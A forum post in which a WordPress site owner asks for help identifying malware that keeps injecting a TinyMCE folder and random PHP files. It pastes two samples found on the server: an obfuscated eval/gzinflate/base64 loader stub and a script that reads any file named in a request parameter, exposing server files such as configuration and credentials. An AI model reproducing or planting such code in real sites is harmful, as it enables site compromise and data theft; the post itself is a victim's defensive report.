Hi all,
We’ve been experiencing this massive virus on our server that injects a TinyMCE folder and random .php files throughout the website. I’ve done a site cleanup: install core WordPress, manually re-install plugins and re-download parent and child themes. Has anyone seen this virus before? Is there any way to pinpoint where the virus is coming from?
Here are examples –
<strong>This is what is inside this file: lkeja9jtww.php</strong>
<?php
eval("\n\$dgreusdi = intval(__LINE__) * 337;");$a = str_replace($dgreusdi, "E", $a);
eval (gzinflate(base64_decode($a)));This is what is inside this file: downloadebook.php
<?php
$file_url = $_GET['filename'];
header('Content-Type: application/octet-stream');
header("Content-Transfer-Encoding: Binary");
header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\"");
readfile($file_url);Thanks in advance!
-Chad